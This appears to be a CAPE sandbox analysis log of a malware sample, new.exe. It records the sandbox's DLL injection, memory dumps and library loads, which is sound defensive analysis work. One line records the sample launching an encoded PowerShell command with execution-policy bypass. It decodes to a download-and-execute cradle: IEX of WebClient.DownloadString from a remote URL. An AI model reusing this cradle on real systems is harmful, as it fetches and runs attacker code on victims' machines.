CAPE

Triggered CAPE Tasks: Task #87742: Injection


Analysis

Category Package Started Completed Duration Options Log
FILE exe 2019-08-13 18:11:18 2019-08-13 18:15:04 226 seconds Show Options Show Log
route = internet
procdump = 1
2019-08-13 19:11:18,000 [root] INFO: Date set to: 08-13-19, time set to: 18:11:18, timeout set to: 200
2019-08-13 19:11:18,015 [root] DEBUG: Starting analyzer from: C:\qyxzo
2019-08-13 19:11:18,015 [root] DEBUG: Storing results at: C:\hUNeBkt
2019-08-13 19:11:18,015 [root] DEBUG: Pipe server name: \\.\PIPE\lrdmqn
2019-08-13 19:11:18,015 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-08-13 19:11:18,015 [root] INFO: Automatically selected analysis package "exe"
2019-08-13 19:11:18,421 [root] DEBUG: Started auxiliary module Browser
2019-08-13 19:11:18,421 [root] DEBUG: Started auxiliary module Curtain
2019-08-13 19:11:18,421 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-08-13 19:11:18,858 [modules.auxiliary.digisig] DEBUG: File is not signed.
2019-08-13 19:11:18,858 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-08-13 19:11:18,858 [root] DEBUG: Started auxiliary module DigiSig
2019-08-13 19:11:18,872 [root] DEBUG: Started auxiliary module Disguise
2019-08-13 19:11:18,872 [root] DEBUG: Started auxiliary module Human
2019-08-13 19:11:18,872 [root] DEBUG: Started auxiliary module Screenshots
2019-08-13 19:11:18,872 [root] DEBUG: Started auxiliary module Sysmon
2019-08-13 19:11:18,872 [root] DEBUG: Started auxiliary module Usage
2019-08-13 19:11:18,872 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2019-08-13 19:11:18,872 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2019-08-13 19:11:18,888 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\new.exe" with arguments "" with pid 1332
2019-08-13 19:11:18,888 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 19:11:18,888 [lib.api.process] INFO: 32-bit DLL to inject is C:\qyxzo\dll\TRGNhiOd.dll, loader C:\qyxzo\bin\wetACeg.exe
2019-08-13 19:11:18,950 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\lrdmqn.
2019-08-13 19:11:18,950 [root] DEBUG: Loader: Injecting process 1332 (thread 1860) with C:\qyxzo\dll\TRGNhiOd.dll.
2019-08-13 19:11:18,950 [root] DEBUG: Process image base: 0x00400000
2019-08-13 19:11:18,950 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\qyxzo\dll\TRGNhiOd.dll.
2019-08-13 19:11:18,950 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00448000 - 0x77110000
2019-08-13 19:11:18,950 [root] DEBUG: InjectDllViaIAT: Allocated 0x1d8 bytes for new import table at 0x00450000.
2019-08-13 19:11:18,950 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 19:11:18,950 [root] DEBUG: Successfully injected DLL C:\qyxzo\dll\TRGNhiOd.dll.
2019-08-13 19:11:18,950 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1332
2019-08-13 19:11:20,963 [lib.api.process] INFO: Successfully resumed process with pid 1332
2019-08-13 19:11:20,963 [root] INFO: Added new process to list with pid: 1332
2019-08-13 19:11:20,994 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 19:11:20,994 [root] DEBUG: Process dumps enabled.
2019-08-13 19:11:21,026 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 19:11:21,026 [root] INFO: Disabling sleep skipping.
2019-08-13 19:11:21,026 [root] INFO: Disabling sleep skipping.
2019-08-13 19:11:21,026 [root] INFO: Disabling sleep skipping.
2019-08-13 19:11:21,026 [root] INFO: Disabling sleep skipping.
2019-08-13 19:11:21,026 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1332 at 0x747e0000, image base 0x400000, stack from 0x186000-0x190000
2019-08-13 19:11:21,026 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\new.exe".
2019-08-13 19:11:21,026 [root] INFO: Monitor successfully loaded in process with pid 1332.
2019-08-13 19:11:21,042 [root] DEBUG: DLL loaded at 0x74950000: C:\Windows\system32\UXTHEME (0x80000 bytes).
2019-08-13 19:11:21,056 [root] DEBUG: DLL loaded at 0x74930000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-08-13 19:11:21,056 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\system32\profapi (0xb000 bytes).
2019-08-13 19:11:21,072 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\system32\SETUPAPI (0x19d000 bytes).
2019-08-13 19:11:21,072 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-08-13 19:11:21,072 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-08-13 19:11:21,072 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-08-13 19:11:21,088 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\APPHELP (0x4c000 bytes).
2019-08-13 19:11:21,088 [root] DEBUG: DLL loaded at 0x742A0000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2019-08-13 19:11:21,104 [root] DEBUG: DLL loaded at 0x74280000: C:\Windows\system32\DWMAPI (0x13000 bytes).
2019-08-13 19:11:21,119 [root] DEBUG: DLL loaded at 0x74240000: C:\Windows\system32\OLEACC (0x3c000 bytes).
2019-08-13 19:11:21,134 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\system32\CLBCATQ (0x83000 bytes).
2019-08-13 19:11:21,134 [root] DEBUG: DLL loaded at 0x749D0000: C:\Windows\system32\NTMARTA (0x21000 bytes).
2019-08-13 19:11:21,134 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-08-13 19:11:21,134 [root] DEBUG: DLL loaded at 0x74230000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-08-13 19:11:21,134 [root] DEBUG: DLL loaded at 0x74220000: C:\Windows\system32\SHFOLDER (0x5000 bytes).
2019-08-13 19:11:21,165 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-08-13 19:11:21,259 [root] DEBUG: DLL loaded at 0x741C0000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2019-08-13 19:11:21,354 [root] DEBUG: DLL loaded at 0x72F70000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 19:11:21,368 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-08-13 19:11:21,400 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-08-13 19:11:21,431 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-08-13 19:11:21,431 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-08-13 19:11:21,431 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-08-13 19:11:21,447 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 19:11:21,477 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-08-13 19:11:32,382 [root] DEBUG: DLL loaded at 0x74210000: C:\Users\user\AppData\Local\Temp\nse9B27.tmp\System (0x6000 bytes).
2019-08-13 19:11:32,382 [root] DEBUG: DLL unloaded from 0x00916108.
2019-08-13 19:11:32,382 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-08-13 19:11:32,398 [root] DEBUG: DLL unloaded from 0x00913B40.
2019-08-13 19:11:32,414 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-08-13 19:11:32,430 [root] DEBUG: DLL unloaded from 0x00913B40.
2019-08-13 19:11:38,529 [root] DEBUG: set_caller_info: Adding region at 0x03FB0000 to caller regions list (ntdll::LdrLoadDll).
2019-08-13 19:11:38,545 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-08-13 19:11:38,545 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-08-13 19:11:38,607 [root] INFO: Announced 32-bit process name: new.exe pid: 828
2019-08-13 19:11:38,607 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 19:11:38,607 [lib.api.process] INFO: 32-bit DLL to inject is C:\qyxzo\dll\TRGNhiOd.dll, loader C:\qyxzo\bin\wetACeg.exe
2019-08-13 19:11:38,607 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\lrdmqn.
2019-08-13 19:11:38,607 [root] DEBUG: Loader: Injecting process 828 (thread 3012) with C:\qyxzo\dll\TRGNhiOd.dll.
2019-08-13 19:11:38,607 [root] DEBUG: Process image base: 0x00400000
2019-08-13 19:11:38,607 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\qyxzo\dll\TRGNhiOd.dll.
2019-08-13 19:11:38,607 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00448000 - 0x77110000
2019-08-13 19:11:38,607 [root] DEBUG: InjectDllViaIAT: Allocated 0x1d8 bytes for new import table at 0x00450000.
2019-08-13 19:11:38,607 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 19:11:38,607 [root] DEBUG: Successfully injected DLL C:\qyxzo\dll\TRGNhiOd.dll.
2019-08-13 19:11:38,607 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 828
2019-08-13 19:11:38,654 [root] INFO: Announced 32-bit process name: new.exe pid: 828
2019-08-13 19:11:38,654 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 19:11:38,654 [lib.api.process] INFO: 32-bit DLL to inject is C:\qyxzo\dll\TRGNhiOd.dll, loader C:\qyxzo\bin\wetACeg.exe
2019-08-13 19:11:38,670 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\lrdmqn.
2019-08-13 19:11:38,670 [root] DEBUG: Loader: Injecting process 828 (thread 3012) with C:\qyxzo\dll\TRGNhiOd.dll.
2019-08-13 19:11:38,670 [root] DEBUG: Process image base: 0x00400000
2019-08-13 19:11:38,670 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\qyxzo\dll\TRGNhiOd.dll.
2019-08-13 19:11:38,670 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0040D000 - 0x00450000
2019-08-13 19:11:38,670 [root] DEBUG: InjectDllViaIAT: Allocated 0x160 bytes for new import table at 0x00410000.
2019-08-13 19:11:38,670 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 19:11:38,670 [root] DEBUG: Successfully injected DLL C:\qyxzo\dll\TRGNhiOd.dll.
2019-08-13 19:11:38,670 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 828
2019-08-13 19:11:38,670 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 19:11:38,670 [root] DEBUG: Process dumps enabled.
2019-08-13 19:11:38,684 [root] INFO: Disabling sleep skipping.
2019-08-13 19:11:38,684 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1332
2019-08-13 19:11:38,684 [root] DEBUG: GetHookCallerBase: thread 1860 (handle 0x0), return address 0x03FBCB50, allocation base 0x03FB0000.
2019-08-13 19:11:38,684 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-08-13 19:11:38,684 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 19:11:38,684 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 828 at 0x747e0000, image base 0x400000, stack from 0x186000-0x190000
2019-08-13 19:11:38,684 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-08-13 19:11:38,684 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\new.exe".
2019-08-13 19:11:38,684 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000320C.
2019-08-13 19:11:38,684 [root] INFO: Added new process to list with pid: 828
2019-08-13 19:11:38,684 [root] INFO: Monitor successfully loaded in process with pid 828.
2019-08-13 19:11:38,684 [root] INFO: Added new CAPE file to list with path: C:\hUNeBkt\CAPE\1332_196982876458112113282019
2019-08-13 19:11:38,684 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x40800.
2019-08-13 19:11:38,684 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x03FB0000.
2019-08-13 19:11:38,684 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\hUNeBkt\CAPE\1332_62499047658112113282019
2019-08-13 19:11:38,700 [root] INFO: Added new CAPE file to list with path: C:\hUNeBkt\CAPE\1332_62499047658112113282019
2019-08-13 19:11:38,700 [root] DEBUG: DumpRegion: Dumped stack region from 0x03FB0000, size 0xf000.
2019-08-13 19:11:38,700 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 19:11:38,700 [root] DEBUG: DLL unloaded from 0x742A0000.
2019-08-13 19:11:38,700 [root] DEBUG: DLL unloaded from 0x75140000.
2019-08-13 19:11:38,700 [root] DEBUG: DLL unloaded from 0x749D0000.
2019-08-13 19:11:38,700 [root] INFO: Notified of termination of process with pid 1332.
2019-08-13 19:11:38,732 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-08-13 19:11:38,779 [root] INFO: Announced 64-bit process name: powershell.exe pid: 2084
2019-08-13 19:11:38,793 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 19:11:38,793 [lib.api.process] INFO: 64-bit DLL to inject is C:\qyxzo\dll\llatUZE.dll, loader C:\qyxzo\bin\ANinQBgZ.exe
2019-08-13 19:11:38,809 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\lrdmqn.
2019-08-13 19:11:38,825 [root] DEBUG: Loader: Injecting process 2084 (thread 2340) with C:\qyxzo\dll\llatUZE.dll.
2019-08-13 19:11:38,841 [root] DEBUG: Process image base: 0x000000013FB00000
2019-08-13 19:11:38,871 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\qyxzo\dll\llatUZE.dll.
2019-08-13 19:11:38,871 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000013FB77000 - 0x000007FEFF430000
2019-08-13 19:11:38,871 [root] DEBUG: InjectDllViaIAT: Allocated 0x228 bytes for new import table at 0x000000013FB80000.
2019-08-13 19:11:38,871 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 19:11:38,871 [root] DEBUG: Successfully injected DLL C:\qyxzo\dll\llatUZE.dll.
2019-08-13 19:11:38,871 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2084
2019-08-13 19:11:38,871 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 828
2019-08-13 19:11:38,871 [root] DEBUG: GetHookCallerBase: thread 3012 (handle 0x0), return address 0x004014B4, allocation base 0x00400000.
2019-08-13 19:11:38,871 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-08-13 19:11:38,871 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-08-13 19:11:38,871 [root] DEBUG: DumpProcess: Module entry point VA is 0x000012B9.
2019-08-13 19:11:38,888 [root] INFO: Added new CAPE file to list with path: C:\hUNeBkt\CAPE\828_27858497638112113282019
2019-08-13 19:11:38,888 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa600.
2019-08-13 19:11:38,904 [root] DEBUG: DLL unloaded from 0x75140000.
2019-08-13 19:11:38,904 [root] INFO: Notified of termination of process with pid 828.
2019-08-13 19:11:38,904 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 19:11:38,904 [root] DEBUG: Process dumps enabled.
2019-08-13 19:11:38,918 [root] INFO: Disabling sleep skipping.
2019-08-13 19:11:38,950 [root] WARNING: Unable to place hook on LockResource
2019-08-13 19:11:38,950 [root] WARNING: Unable to hook LockResource
2019-08-13 19:11:38,966 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 19:11:38,966 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2084 at 0x0000000074460000, image base 0x000000013FB00000, stack from 0x00000000001C5000-0x00000000001D0000
2019-08-13 19:11:38,966 [root] DEBUG: Commandline: C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8A
2019-08-13 19:11:38,966 [root] INFO: Added new process to list with pid: 2084
2019-08-13 19:11:38,966 [root] INFO: Monitor successfully loaded in process with pid 2084.
2019-08-13 19:11:39,028 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-08-13 19:11:39,028 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-08-13 19:11:39,028 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\shell32 (0xd88000 bytes).
2019-08-13 19:11:39,043 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-08-13 19:11:39,059 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-08-13 19:11:39,059 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32 (0x1f4000 bytes).
2019-08-13 19:11:39,075 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-08-13 19:11:39,075 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-08-13 19:11:39,075 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-08-13 19:11:39,091 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\propsys (0x12c000 bytes).
2019-08-13 19:11:39,091 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-08-13 19:11:39,091 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-08-13 19:11:39,105 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 19:11:39,216 [root] INFO: Process with pid 1332 has terminated
2019-08-13 19:11:39,480 [root] DEBUG: DLL loaded at 0x000007FEF7810000: C:\Windows\system32\LINKINFO (0xc000 bytes).
2019-08-13 19:11:39,496 [root] DEBUG: DLL loaded at 0x000007FEF8900000: C:\Windows\system32\ntshrui (0x80000 bytes).
2019-08-13 19:11:39,496 [root] DEBUG: DLL loaded at 0x000007FEFCB90000: C:\Windows\system32\srvcli (0x23000 bytes).
2019-08-13 19:11:39,528 [root] DEBUG: DLL loaded at 0x000007FEF8AC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-08-13 19:11:39,528 [root] DEBUG: DLL loaded at 0x000007FEFB0B0000: C:\Windows\system32\slc (0xb000 bytes).
2019-08-13 19:11:39,589 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-08-13 19:11:39,589 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-08-13 19:11:39,605 [root] DEBUG: DLL loaded at 0x000007FEF2F10000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-08-13 19:11:39,621 [root] DEBUG: DLL loaded at 0x000007FEF2480000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-08-13 19:11:39,621 [root] DEBUG: DLL loaded at 0x00000000747D0000: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80 (0xc9000 bytes).
2019-08-13 19:11:39,667 [root] DEBUG: DLL loaded at 0x000007FEF15A0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni (0xedc000 bytes).
2019-08-13 19:11:39,684 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-08-13 19:11:39,698 [root] DEBUG: DLL loaded at 0x000007FEF0B70000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni (0xa23000 bytes).
2019-08-13 19:11:39,698 [root] DEBUG: DLL loaded at 0x000007FEF0AB0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni (0xb2000 bytes).
2019-08-13 19:11:39,714 [root] DEBUG: DLL loaded at 0x000007FEEFF50000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni (0xb5d000 bytes).
2019-08-13 19:11:39,714 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\version (0xc000 bytes).
2019-08-13 19:11:39,792 [root] DEBUG: DLL loaded at 0x000007FEEFC20000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni (0x32e000 bytes).
2019-08-13 19:11:39,792 [root] DEBUG: DLL loaded at 0x000007FEEFBB0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni (0x69000 bytes).
2019-08-13 19:11:39,792 [root] DEBUG: DLL loaded at 0x000007FEF4CE0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni (0x32000 bytes).
2019-08-13 19:11:39,792 [root] DEBUG: DLL loaded at 0x000007FEEFB00000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni (0xaa000 bytes).
2019-08-13 19:11:39,808 [root] DEBUG: DLL loaded at 0x000007FEEFA10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni (0xe5000 bytes).
2019-08-13 19:11:39,808 [root] DEBUG: DLL loaded at 0x000000001E230000: C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x49000 bytes).
2019-08-13 19:11:39,823 [root] DEBUG: DLL loaded at 0x000007FEEF7F0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni (0x216000 bytes).
2019-08-13 19:11:39,823 [root] DEBUG: DLL loaded at 0x000007FEEF6D0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni (0x118000 bytes).
2019-08-13 19:11:39,839 [root] DEBUG: DLL loaded at 0x000007FEF3870000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni (0x3e000 bytes).
2019-08-13 19:11:39,871 [root] DEBUG: DLL loaded at 0x00000642FF4A0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\culture (0xa000 bytes).
2019-08-13 19:11:39,871 [root] DEBUG: DLL unloaded from 0x00000642FF4A0000.
2019-08-13 19:11:39,917 [root] DEBUG: DLL loaded at 0x000007FEEF540000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit (0x184000 bytes).
2019-08-13 19:11:39,948 [root] DEBUG: DLL loaded at 0x000007FEEEE90000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni (0x6a5000 bytes).
2019-08-13 19:11:39,963 [root] DEBUG: DLL loaded at 0x000007FEEED20000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni (0x16c000 bytes).
2019-08-13 19:11:39,963 [root] DEBUG: DLL loaded at 0x000007FEEEB80000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni (0x195000 bytes).
2019-08-13 19:11:39,963 [root] DEBUG: DLL loaded at 0x000007FEF9890000: C:\Windows\system32\shfolder (0x7000 bytes).
2019-08-13 19:11:40,151 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-08-13 19:11:40,197 [root] DEBUG: DLL loaded at 0x000007FEEE330000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni (0x84b000 bytes).
2019-08-13 19:11:40,197 [root] DEBUG: DLL loaded at 0x000000001D140000: C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2ff000 bytes).
2019-08-13 19:11:40,197 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-08-13 19:11:40,213 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-08-13 19:11:40,213 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-08-13 19:11:40,213 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-08-13 19:11:40,230 [root] INFO: Process with pid 828 has terminated
2019-08-13 19:11:40,308 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00250000 to caller regions list (advapi32::RegOpenKeyExW).
2019-08-13 19:11:40,322 [root] DEBUG: DLL loaded at 0x000007FEEE1E0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\091b931d0f6408001747dbbbb05dbe66\System.Configuration.ni (0x143000 bytes).
2019-08-13 19:11:40,338 [root] DEBUG: DLL loaded at 0x000007FEF54D0000: C:\Windows\system32\rasapi32 (0x62000 bytes).
2019-08-13 19:11:40,338 [root] DEBUG: DLL loaded at 0x000007FEF54B0000: C:\Windows\system32\rasman (0x1c000 bytes).
2019-08-13 19:11:40,354 [root] DEBUG: DLL loaded at 0x000007FEFA720000: C:\Windows\system32\rtutils (0x11000 bytes).
2019-08-13 19:11:40,369 [root] DEBUG: DLL loaded at 0x000007FEFC890000: C:\Windows\system32\mswsock (0x55000 bytes).
2019-08-13 19:11:40,385 [root] DEBUG: DLL loaded at 0x000007FEFC290000: C:\Windows\System32\wshtcpip (0x7000 bytes).
2019-08-13 19:11:40,385 [root] DEBUG: DLL loaded at 0x000007FEFC880000: C:\Windows\System32\wship6 (0x7000 bytes).
2019-08-13 19:11:40,401 [root] DEBUG: DLL unloaded from 0x000007FEF54B0000.
2019-08-13 19:11:40,417 [root] DEBUG: DLL loaded at 0x000007FEF4950000: C:\Windows\system32\winhttp (0x71000 bytes).
2019-08-13 19:11:40,417 [root] DEBUG: DLL loaded at 0x000007FEF4500000: C:\Windows\system32\webio (0x64000 bytes).
2019-08-13 19:11:40,431 [root] DEBUG: DLL loaded at 0x000007FEFAF10000: C:\Windows\system32\IPHLPAPI (0x27000 bytes).
2019-08-13 19:11:40,431 [root] DEBUG: DLL loaded at 0x000007FEFAED0000: C:\Windows\system32\WINNSI (0xb000 bytes).
2019-08-13 19:11:40,447 [root] DEBUG: DLL loaded at 0x000007FEFAD90000: C:\Windows\system32\dhcpcsvc6 (0x11000 bytes).
2019-08-13 19:11:40,447 [root] DEBUG: DLL loaded at 0x000007FEFAD70000: C:\Windows\system32\dhcpcsvc (0x18000 bytes).
2019-08-13 19:11:40,463 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-08-13 19:11:40,463 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 19:11:40,463 [root] DEBUG: DLL loaded at 0x000007FEFC500000: C:\Windows\system32\credssp (0xa000 bytes).
2019-08-13 19:11:40,479 [root] DEBUG: DLL unloaded from 0x000007FEFC8F0000.
2019-08-13 19:11:40,526 [root] DEBUG: DLL loaded at 0x000007FEFC710000: C:\Windows\system32\DNSAPI (0x5b000 bytes).
2019-08-13 19:11:40,526 [root] DEBUG: DLL loaded at 0x000007FEFA030000: C:\Windows\system32\rasadhlp (0x8000 bytes).
